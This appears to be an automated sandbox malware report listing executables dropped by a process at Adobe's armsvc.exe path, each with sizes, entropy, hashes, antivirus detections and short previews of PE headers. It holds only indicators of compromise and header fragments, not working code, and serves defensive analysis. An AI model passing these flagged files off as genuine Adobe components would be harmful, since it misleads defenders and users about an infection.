                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x..F<...<...<...(..3...(......(......^.F.;...^......^......^..)...(..5...<...N......3.....D.=......=...Rich<...........................PE..L.....d.................N...t....../........`....@..........................P"..............................................!..d....P..............................P...T...............................@............`...............................text...\M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc........P.......*..............@..@.reloc...p..........................@...........................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1530880
                                                                                                                                                  Entropy (8bit):4.995594843201295
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:5KU/h/4KU/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:5r/VULNiXicJFFRGNzj3
                                                                                                                                                  MD5:7FF1545300ACB830F5318AB6E28EBB3A
                                                                                                                                                  SHA1:E6247C90B8170398E3DEDD861CA0606F9AB5A81C
                                                                                                                                                  SHA-256:89D031210375622AC960CF21C39DC1C5ADF88B482B1CC7AF1A69028C2491F6E6
                                                                                                                                                  SHA-512:F473B833D811DE9C9B0CC38C1CCBBF43F5367D6E3FA4E43D696F1C0205AB1AF8A123FDCB02F9AF7C99B288D90861491C8D15FFC53B8107E692102B4B76CBBB29
                                                                                                                                                  Malicious:true
                                                                                                                                                  Antivirus:
                                                                                                                                                   • Antivirus: Avira, Detection: 100%
                                                                                                                                                   • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9..#}..p}..p}..pi.qr..pi.q..pi.qo..p..}pz..p..qX..p..qo..p..qh..pi.qt..p}..p...p..qr..p...p|..p..q|..pRich}..p........................PE..L.....d.................N...t......7........`....@..........................P".....4y.......................................!..d....P.............................P...T...............................@............`...............................text....M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc.......P.......*..............@..@.reloc...p..........................@...........................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1669632
                                                                                                                                                  Entropy (8bit):5.069203119438947
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:Ux7YiBLZ05jNTmJWExj/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:UxUiHIjNgjLNiXicJFFRGNzj3
                                                                                                                                                  MD5:1B8817EFF563851DCE02E1E6DEE55BB1
                                                                                                                                                  SHA1:B3C9B8D6002B6B860AA0328B730482842D895711
                                                                                                                                                  SHA-256:C24179518989CD3BEF44ED9FBE9551266706E93C9EB19D53D190408DBDFF047A
                                                                                                                                                  SHA-512:10EB6878874EBFF4E9584DBBAC44AD38163C218AA647F022440F5397AB49FE1B4DFF7B5075AC58FD47C51B0CBA519809E89C11394A09BE897A329BE176225752
                                                                                                                                                  Malicious:true
                                                                                                                                                  Antivirus:
                                                                                                                                                   • Antivirus: Avira, Detection: 100%
                                                                                                                                                   • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......p...4rv.4rv.4rv. .u.>rv. .s..rv. .r.&rv.V.r.!rv.V.u.,rv.V.s..rv. .w.?rv.4rw..rv..r.&rv..s.0rv....5rv..t.5rv.Rich4rv.................PE..L.....d............................^.............@...........................%.....Y...........................................x...................................L...T............................4..@...................,........................text...,........................... ..`.rdata..:(.......*..................@..@.data............t..................@....rsrc................:..............@..@.reloc.......0......................@...................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1574912
                                                                                                                                                  Entropy (8bit):5.027359293706216
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:ElnRkld6fgJcEwixh/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:gokfgJcEwChLNiXicJFFRGNzj3
                                                                                                                                                  MD5:F10E046C09F70C6B72C18BA346A150E4
                                                                                                                                                  SHA1:23B831A830A2494B0C064096DA335464849C44FD
                                                                                                                                                  SHA-256:22AD0CAD42A3028796B11E70E6489BA80E28DB9924EF29CE173E5798FDA8DD40
                                                                                                                                                  SHA-512:25FEDE02F26234FA1A0010C890A5D29069B2CC88B835507E74565E0DE5BAB326535743AF8FEBE292041E5D3D7D5CB071CE085D4D9B151334254E80F19E912ECF
                                                                                                                                                  Malicious:true
                                                                                                                                                  Antivirus:
                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........|../../../L...../L...8./+...../+...../+...../L...../L...../../4./..../.s/../..../Rich../........................PE..L...A..d.............................s............@...........................#......B......................................<........P...2..............................T...........................8...@............................................text............................... ..`.rdata...%.......&..................@..@.data...d(... ......................@....rsrc....2...P...4..................@..@.reloc...............H..............@...................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1677824
                                                                                                                                                  Entropy (8bit):5.084990338798479
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:eWR5k8hb0Haw+xR/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:eWLk8SHawmRLNiXicJFFRGNzj3
                                                                                                                                                  MD5:4F59D110799E64365FB4B5348D220CF0
                                                                                                                                                  SHA1:D39AD96F76D9981AE3B9A0416CAB1065BD874E0B
                                                                                                                                                  SHA-256:799D3BCF91156DC35F676A9CDDBD3C0D258285F594915609080D22C8AAEAC2D5
                                                                                                                                                  SHA-512:87AD5CFE4EBF655DC07B6B64AD4D47F02D6BF002598E6C24373A53DD4A37E70E18E20D408595340C76F18586920C1300911983693185DBA6FD10512BDC42DFE5
                                                                                                                                                  Malicious:true
                                                                                                                                                  Antivirus:
                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........v.s.%.s.%.s.%...$ms.%...$.s.%...$.s.%...$.s.%...$.s.%...$.s.%...$.s.%.s.%xr.%...$.s.%...%.s.%...$.s.%Rich.s.%................PE..d...X..d.........."..........R......L..........@..............................$........... ..................................................M....... ...2.......,................... ..T............................ ..................(............................text............................... ..`.rdata..............................@..@.data....6...p.......X..............@....pdata...,...........j..............@..@_RDATA..............................@..@.gxfg...0...........................@..@.gehcont............................@..@.rsrc....2... ...4..................@..@.reloc...p...`......................@...........................................................................................................................
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1437696
                                                                                                                                                  Entropy (8bit):4.700943846932461
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:wkCKABp/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:wxKkpLNiXicJFFRGNzj3
                                                                                                                                                  MD5:78484D01C84E95A6FA1581BB1E880948
                                                                                                                                                  SHA1:57F9F5A3A9ACAF273F0FA73F59ED7B9632EE815A
                                                                                                                                                  SHA-256:7E77E9646832D8E8CE9FF42385204E306966AEDD4B6998E05A2C56EB12E83F3B
                                                                                                                                                  SHA-512:DE7580D0D23CAE10BABCCEF5A298CA8152CB92DCE71016C4D64D52E676BD44974E9108065E0028472F48E327C36C0251DAA69FC7D032A48C2D6F4CB173FAD7C3
                                                                                                                                                  Malicious:true
                                                                                                                                                  Antivirus:
                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........;...U..U..U.M.V..U.M.P...U.M.Q..U.*.Q..U.*.V..U.*.P..U.M.T..U..T...U..\..U....U.....U..W..U.Rich..U.........PE..L...9..d.................D..........Ru.......`....@........................... .....[.......................................P...x....... ...........................p[..T............................[..@...............L............................text....B.......D.................. ..`.data...x....`.......H..............@....idata...............R..............@..@.rsrc... ............\..............@..@.reloc...p...........@..............@...........................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1383936
                                                                                                                                                  Entropy (8bit):4.6808704471269555
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:AjNWBPa/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:SNmyLNiXicJFFRGNzj3
                                                                                                                                                  MD5:F0DB49F2F1C857BCD3628624905D7103
                                                                                                                                                  SHA1:73593FA7F5C36AB006E07A43A00139D0656BDCA3
                                                                                                                                                  SHA-256:490DD7F89309CEE1C758181470C767F5F10C929C772BF6C2605EED353345A389
                                                                                                                                                  SHA-512:0B0E722DD30EFF7068BC73A56E969C7B588542639B87D76964D6F19A0FC168A270AA7D726815A1441849C9E1EC33ED6FEA9C72DFC11C9A3E8C48BB67F827FAD9
                                                                                                                                                  Malicious:true
                                                                                                                                                  Antivirus:
                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............Z...Z...Z..[..Z..[L..Z..[..Zu.[.Zu.[..Zu.[..Z..[..Z...Z...Z..[...Z..]Z...Z..5Z...Z..[...ZRich...Z........................PE..L...:..d..........................................@........................... ......(.......................................5..<....`..p2...........................+..T...........................X+..@............................................text...h........................... ..`.rdata...\.......^..................@..@.data........@.......0..............@....rsrc...p2...`...4...:..............@..@.reloc...p...........n..............@...........................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1458176
                                                                                                                                                  Entropy (8bit):4.778597871587847
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:EijRyhdsRrI/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:EijsoRILNiXicJFFRGNzj3
                                                                                                                                                  MD5:A7AF7A01A549312BB3F5BA2E469340E0
                                                                                                                                                  SHA1:D93DF3CCA2A48B3DCF6B7B76325B7ADE61E753AA
                                                                                                                                                  SHA-256:E680E6E0B38F9E7131EAD95B20E3CE3DB212BA766F11F69CAED0CE2777E62C21
                                                                                                                                                  SHA-512:CFBA5019A622A489018611F9FB9EDFA2863E927A6F8B866DE7EE397BD2B2DAB8DA897C6499B0676C70268EEC5F6A7C60D1EF774E81475A3FB6C720190A5F8DA9
                                                                                                                                                  Malicious:true
                                                                                                                                                  Antivirus:
                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........9...X..X..X..~*...X..~*..X...2..X...2..X...2...X...3..X..~*..X..~*..X..X..?Y...3..X...3..X..Rich.X..........PE..d...A..d.........."......R...z.......R.........@..............................!........... ..................................................p..x....................................V..T...........................0W...............p...............................text....P.......R.................. ..`.rdata.......p.......V..............@..@.data...x3...........d..............@....pdata...............t..............@..@_RDATA..............................@..@.gxfg...............................@..@.gehcont............................@..@.reloc...`... ......................@...........................................................................................................................................................................
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1498112
                                                                                                                                                  Entropy (8bit):4.895431685230195
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:l16DmRF+wpx/Qafv/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:MmRF+wn/JfvLNiXicJFFRGNzj3
                                                                                                                                                  MD5:C5822B9F91A5D1C7A86E51EC41F8E58F
                                                                                                                                                  SHA1:74E330380A29861D2489E5CAA28B9BEF9876F346
                                                                                                                                                  SHA-256:601C5BE34A8C6FB93AE21836EADB835225EF630342B9ECB034DF585599D23DFA
                                                                                                                                                  SHA-512:1A4F419A87D41BCC2888447CB10183BFDBB0FE76A4684F4142E55CB141620B535EBBE71E60B0974E86DC61E399965EECB5151DA4AA150E15E6A3AC4913DA1015
                                                                                                                                                  Malicious:true
                                                                                                                                                  Antivirus:
                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......|6..8W..8W..8W...%..6W...%...W...=...W...=...W...=..{W...%.. W...%..#W..8W...V..L<...W..L<s.9W..L<..9W..Rich8W..................PE..L...Y..d.....................r....................@...........................!......................................................0...2..............................T...........................h...@............................................text...e........................... ..`.rdata..b...........................@..@.data....'..........................@....rsrc....2...0...4..................@..@.reloc.......p......................@...........................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1383936
                                                                                                                                                  Entropy (8bit):4.680834677021535
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:nE21BPt/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:E2bVLNiXicJFFRGNzj3
                                                                                                                                                  MD5:AE06F5E0FEC7D4EF1C3DE948218513DC
                                                                                                                                                  SHA1:684ACCF6C89DA805D92F61D84E8803B0133FBF71
                                                                                                                                                  SHA-256:1D618FDD02FD290C8E56A83C67B2EDE34DFFE8DCB36BF9D3EDF02A5ED5C08F67
                                                                                                                                                  SHA-512:D9EC943D015695C21D542B864E69506D234BCC0290EB175A312BD7B069BE49DB02EA2CD4799E0EB646F8CA79233C138B1D1008FF1E0738F3257D06809E306721
                                                                                                                                                  Malicious:true
                                                                                                                                                  Antivirus:
                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............Z...Z...Z..[..Z..[L..Z..[..Zu.[.Zu.[..Zu.[..Z..[..Z...Z...Z..[...Z..]Z...Z..5Z...Z..[...ZRich...Z........................PE..L...;..d..........................................@........................... ..............................................5..<....`..p2...........................+..T...........................h+..@............................................text...h........................... ..`.rdata...\.......^..................@..@.data........@.......0..............@....rsrc...p2...`...4...:..............@..@.reloc...p...........n..............@...........................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2151936
                                                                                                                                                  Entropy (8bit):7.985856588637768
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:49152:CskVX3lfrFfR0BecCqKBs+4o8YhAWLNiXicJFFRGNzj3:CPR1frZRpcTKX4U7wRGpj3
                                                                                                                                                  MD5:2522E8C81BDAF17B16D7F1E4F91DD60F
                                                                                                                                                  SHA1:9AE76A8C36344C6C671580872F141B847B7B05AB
                                                                                                                                                  SHA-256:9E7D5DF42D9063245641E1FA4B536CE154BD61A28010F9433CFFF2BBC538ADBE
                                                                                                                                                  SHA-512:B731297A7E9DDCB30EA4A9AADA38BE2ED295CBE951288962AED248E670B3F7DC8AE163BE7B5FDF5D6B57FE554122139E9610FCCC8A3DD5480D2DB4D842FEA151
                                                                                                                                                  Malicious:true
                                                                                                                                                  Antivirus:
                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."......4.....................@.............................@!......1!... ..................................................X..P...............|....................W..............................PP..@............Z...............................text...&2.......4.................. ..`.rdata.......P.......8..............@..@.data...p....p.......N..............@....pdata..|............P..............@..@.00cfg..0............T..............@..@.retplne.............V...................rsrc................X..............@..@.reloc.......P......................@...........................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):2151936
                                                                                                                                                  Entropy (8bit):7.9858569040174086
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:49152:3skVX3lfrFfR0BecCqKBs+4o8YhAWLNiXicJFFRGNzj3:3PR1frZRpcTKX4U7wRGpj3
                                                                                                                                                  MD5:AA703F55BA9E18206D8832E15528C683
                                                                                                                                                  SHA1:0603FE18E0F9ADD00640E92123EFA8F86458801B
                                                                                                                                                  SHA-256:732BB1D8556BAF1A8A491FDDB28AAEF35A85003C2CF68FEAA35D0DDF1F8342A3
                                                                                                                                                  SHA-512:06EC90775F61C20DD61C523A8C96F19D4B3A6166833D850D95BC38297094AE8847A9A8C73C9E30BCB918616BF9E952106F888E2BF239D7A8D679671534ED5B3F
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....|.e.........."......4.....................@.............................@!......;!... ..................................................X..P...............|....................W..............................PP..@............Z...............................text...&2.......4.................. ..`.rdata.......P.......8..............@..@.data...p....p.......N..............@....pdata..|............P..............@..@.00cfg..0............T..............@..@.retplne.............V...................rsrc................X..............@..@.reloc.......P......................@...........................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1313792
                                                                                                                                                  Entropy (8bit):4.567737630702455
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12288:PViJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:P5/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                  MD5:E9C0F1C062241B775FF1617D05689A0C
                                                                                                                                                  SHA1:052A29D147CAF86250D476C97E42DBABA0A7DA98
                                                                                                                                                  SHA-256:9E3360EC004FC83DC819D7BF102BC5BF0205A726BB24EF23C83A7DA37F1C0328
                                                                                                                                                  SHA-512:F3BD8928ACB2E10373762263B4CEC1478C18D84D52E5F118B98413155D7BC0E35EC80A04A3B05DEDB71B36E02784E0C6EF3D537C5954AA75553AF77BE3FBC34F
                                                                                                                                                  Malicious:true
                                                                                                                                                  Antivirus:
                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........8.C.VWC.VWC.VWJ..WS.VW!.WVA.VW!.SV\.VW!.RVO.VW!.UVB.VWW.WVJ.VWC.WW!.VW.SVB.VW..WB.VW.TVB.VWRichC.VW........PE..L.....d.................8...6.......4.......P....@.........................................................................$i.......................................b..T............................a..@............P...............................text....7.......8.................. ..`.rdata...#...P...$...<..............@..@.data...L............`..............@....rsrc................b..............@..@.reloc...`...........l..............@...........................................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1297920
                                                                                                                                                  Entropy (8bit):4.52884857486344
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12288:k2YiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:9q/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                  MD5:F60FBF6F33C4AA573EC47E55E8CC3416
                                                                                                                                                  SHA1:D8D5A04388845D92430858A50A1F9B6064E95E29
                                                                                                                                                  SHA-256:80CC37BB84B992A8E7A1221313C70ED96C518C1B8C1A233FE1024E4FD461DFE6
                                                                                                                                                  SHA-512:D278E39C03A7CC557EE8A0CDE2E13C81ED69A0D9AECDE6AC357F773E380AA750C4FF4DF6B0324951CAF1E46A704F870534F97E1D975BD7A756BC7996579741AA
                                                                                                                                                  Malicious:true
                                                                                                                                                  Antivirus:
                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................8........................................&.......@..d...........................h"..T............................!..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0....... ..............@....rsrc...d....@......."..............@..@.reloc...`...P......................@...................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1530880
                                                                                                                                                  Entropy (8bit):4.994900023712343
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:bpwOtO7H/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:bmOtmHLNiXicJFFRGNzj3
                                                                                                                                                  MD5:352B56037ED5BF42745E58A214B65AE2
                                                                                                                                                  SHA1:1358ADC2768A0E0953A9E39863B8CA64AC301151
                                                                                                                                                  SHA-256:7D3C251E241069814D8043B292E00AADA14CCF5F5C235AB1F8197BB9D5C33621
                                                                                                                                                  SHA-512:25AB506C99729A30F4BFB911089D400940A12F8BE0A9B93C0E68735188DB8F1905E95DB4D5ED9BA8AAC53175460740DDFF952629C269622E16B23EB23E5CBAF4
                                                                                                                                                  Malicious:true
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x..F<...<...<...(..3...(......(......^.F.;...^......^......^..)...(..5...<...N......3.....D.=......=...Rich<...........................PE..L.....d.................N...t....../........`....@..........................P".....mN.......................................!..d....P..............................P...T...............................@............`...............................text...\M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc........P.......*..............@..@.reloc...p..........................@...........................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1368064
                                                                                                                                                  Entropy (8bit):4.635819287267484
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:01u/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:0QLNiXicJFFRGNzj3
                                                                                                                                                  MD5:9E4D1D65774446CEAC37E7B14DA78E19
                                                                                                                                                  SHA1:98C652C74DAC1D71C79F3F22A0B2D91688A5CE21
                                                                                                                                                  SHA-256:2672BC0E6763E92A506AC66A2D3508AC53A531A9144646470F44B31CE876A1EC
                                                                                                                                                  SHA-512:2E4ECB4CB39926B999BBB79368F3E12842C042F98B9C81860C5E924236DB2AEE6771156AEAA752A944046964982CD1F3C6B1DCA2EDDB7297A0F551789E173D4C
                                                                                                                                                  Malicious:true
                                                                                                                                                  Antivirus:
                                                                                                                                                  • Antivirus: Avira, Detection: 100%
                                                                                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......VT.f.5.5.5.5.5.5.M\5.5.5pM.4.5.5pM.4.5.5pM.4.5.5.^.4.5.5.5.5.5.5pM.455.5.L.4.5.5.L05.5.5.L.4.5.5Rich.5.5........................PE..L.....d.................P...........K.......`....@..................................J......................................8...@......................................T...............................@............`...............................text....O.......P.................. ..`.rdata...g...`...h...T..............@..@.data...@...........................@....rsrc...............................@..@.reloc...`...p.......@..............@...........................................................................................................................................................................................................................................................................................................
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1530880
                                                                                                                                                  Entropy (8bit):4.995587337285073
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:IKU/h/4KU/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:Ir/VULNiXicJFFRGNzj3
                                                                                                                                                  MD5:8BEBB4A3B0107376919D8CE777648ABB
                                                                                                                                                  SHA1:DC18DEFDBFE35529BEEF1B66363451D48BCE858B
                                                                                                                                                  SHA-256:3BE832D1D554CD5F5BEC94F32A31A0E6F16A519EA0006E775FB24E312CB7B95B
                                                                                                                                                  SHA-512:0843490B6C86B75714F1BF702510529FBEFF8EB94A69C84A84AF057F01302924E3633527CE2A40247CAC2E0460DDD0E08C1A615D06BF23F6582FE2030901E512
                                                                                                                                                  Malicious:true
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1669632
                                                                                                                                                  Entropy (8bit):5.069202713461549
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:Ax7YiBLZ05jNTmJWExj/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:AxUiHIjNgjLNiXicJFFRGNzj3
                                                                                                                                                  MD5:D4748E5EFB96960B70389676B809EB4F
                                                                                                                                                  SHA1:EC8C07FF749A0A6E8A5D8CF580DB6F4B2D975033
                                                                                                                                                  SHA-256:ACAF4F428134C591460B05A44AC918786BBF11690A6C7A9AF140AC49906F3420
                                                                                                                                                  SHA-512:87D93A0EF60A788DF3B21778B4FDE87059EB083649F082ABB296D17A4446C26B52B2757C4011F1F7C12FC984B18E429F176E0126A92E7C8AC76F6DD310BC7934
                                                                                                                                                  Malicious:true
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1297920
                                                                                                                                                  Entropy (8bit):4.529288305371961
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:12288:oorIiJw/9Rrw0R1u4V/0YG3wx6EcJHUEhPUotFZr+1izHGNe8jKk34z:zu/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz
                                                                                                                                                  MD5:F31DACF8D9F1689A420268AA335C0969
                                                                                                                                                  SHA1:3C42CE0E7DDB1C4A39EBB6E4474947C01E05CE3A
                                                                                                                                                  SHA-256:28CCBE3ECF5F750B3AB6DB5D5E4E4A0AC38D7B2B4886185B3D1CBA147DD1624E
                                                                                                                                                  SHA-512:56FFD19AA7F0AFD6409108EDEAA59AD4C429A7ED5FEAA591DB6CE5A5189248D69834BEEC1334488F1092F778E05B92F8CCC60F1E2A2AB721B81B1B58E1F0F498
                                                                                                                                                  Malicious:true
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                  Category:dropped
                                                                                                                                                  Size (bytes):1397760
                                                                                                                                                  Entropy (8bit):4.695173545067193
                                                                                                                                                  Encrypted:false
                                                                                                                                                  SSDEEP:24576:6dP/l/TwSfVcYG3K/cJHlnFR+IGNe8j3Iz:u9LNiXicJFFRGNzj3
                                                                                                                                                  MD5:D7F6B8A436E10C8FEE55A8E659376E42
                                                                                                                                                  SHA1:D3306FB922A9AD193EC3DE4AFB4D7F62538994ED
                                                                                                                                                  SHA-256:354AD431593B3545F3CEBAD1BF47F7115DF677C93B9364EE06B58BE68A75037F
                                                                                                                                                  SHA-512:3FB8C196992E5C88324F33F9AF22E3CA1C24C47E5853A6CA2BF2696C1F5E881C91BC7C0897A8E679A61F7F454320903D90138D0BBC6EF0130D2277BCC6818A2D
                                                                                                                                                  Malicious:true
                                                                                                                                                  Process:C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe
